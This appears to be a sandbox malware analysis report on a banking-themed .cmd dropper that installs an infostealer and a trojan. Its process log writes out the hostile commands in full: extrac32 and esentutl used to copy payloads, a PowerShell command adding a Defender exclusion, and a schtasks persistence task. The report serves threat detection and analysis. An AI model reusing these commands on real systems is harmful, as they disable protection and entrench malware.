                      Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49791 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: server_BTC.exe.10.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.12.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28670 NtUnmapViewOfSection,4_2_02B28670
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28400 NtReadVirtualMemory,4_2_02B28400
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B27A2C NtAllocateVirtualMemory,4_2_02B27A2C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02B2DC8C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B2DC04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B28D70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02B2DD70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B27D78 NtWriteVirtualMemory,4_2_02B27D78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B27A2A NtAllocateVirtualMemory,4_2_02B27A2A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B2DBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B28D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B68670 NtUnmapViewOfSection,24_2_02B68670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B68400 NtReadVirtualMemory,24_2_02B68400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B67A2C NtAllocateVirtualMemory,24_2_02B67A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B68D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_02B68D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B6DD70 NtOpenFile,NtReadFile,NtClose,24_2_02B6DD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B67D78 NtWriteVirtualMemory,24_2_02B67D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B686F7 NtUnmapViewOfSection,24_2_02B686F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B67A2A NtAllocateVirtualMemory,24_2_02B67A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B68D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,24_2_02B68D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F8670 NtUnmapViewOfSection,28_2_029F8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F8400 NtReadVirtualMemory,28_2_029F8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F7A2C NtAllocateVirtualMemory,28_2_029F7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F7D78 NtWriteVirtualMemory,28_2_029F7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,28_2_029F8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029FDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,28_2_029FDD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F86F7 NtUnmapViewOfSection,28_2_029F86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F7A2A NtAllocateVirtualMemory,28_2_029F7A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029FDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,28_2_029FDBB0
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029FDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,28_2_029FDC8C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029FDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,28_2_029FDC04
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029F8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,28_2_029F8D6E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28788 CreateProcessAsUserW,4_2_02B28788
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B120C44_2_02B120C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3E5964_2_02B3E596
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EFEA8011_2_00EFEA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EF4A9811_2_00EF4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EFAA4311_2_00EFAA43
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EF3E8011_2_00EF3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EFDF0011_2_00EFDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EF41C811_2_00EF41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EFDF0011_2_00EFDF00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_065766E811_2_065766E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_065756B811_2_065756B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657C2A011_2_0657C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657B32A11_2_0657B32A
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657317811_2_06573178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_06577E7811_2_06577E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657779811_2_06577798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657E4C011_2_0657E4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657235011_2_06572350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657004011_2_06570040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_06575DDF11_2_06575DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_0657002511_2_06570025
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 12_2_012185B712_2_012185B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 12_2_012185C812_2_012185C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0478B49013_2_0478B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0478C66213_2_0478C662
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B21B9418_2_05B21B94
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B2DAAC18_2_05B2DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B225B818_2_05B225B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B225A818_2_05B225A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B2E62018_2_05B2E620
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B2417418_2_05B24174
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B21D2018_2_05B21D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B21B8818_2_05B21B88
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 18_2_05B9336018_2_05B93360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 24_2_02B520C424_2_02B520C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_025241C826_2_025241C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_0252AA4826_2_0252AA48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_02524A9826_2_02524A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_0252EA8026_2_0252EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_0252DE3826_2_0252DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_02523E8026_2_02523E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_0252DE3826_2_0252DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061C1B4826_2_061C1B48
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061C1F0026_2_061C1F00
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D7E7826_2_061D7E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D56B826_2_061D56B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D66E826_2_061D66E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061DC2A026_2_061DC2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061DB33826_2_061DB338
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D236026_2_061D2360
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D779826_2_061D7798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061DE4C026_2_061DE4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D5DF026_2_061D5DF0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D004026_2_061D0040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 26_2_061D000726_2_061D0007
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 28_2_029E20C428_2_029E20C4
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 029F894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 029E46D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02B6894C appears 50 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02B546D4 appears 155 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 02B54860 appears 683 times
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: String function: 029E4860 appears 683 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B146D4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B289D0 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B2894C appears 56 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B144DC appears 74 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B14500 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B14860 appears 949 times
                      Source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: armsvc.exe.10.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.10.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winCMD@52/25@5/3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B17FD2 GetDiskFreeSpaceA,4_2_02B17FD2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B26DC8 CoCreateInstance,4_2_02B26DC8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-34f23828e93cca9c73779169-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-34f23828e93cca9c-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB03128.TMPJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdReversingLabs: Detection: 18%
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-188
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                      Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Wisrysxl.PIF "C:\Users\Public\Libraries\Wisrysxl.PIF"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
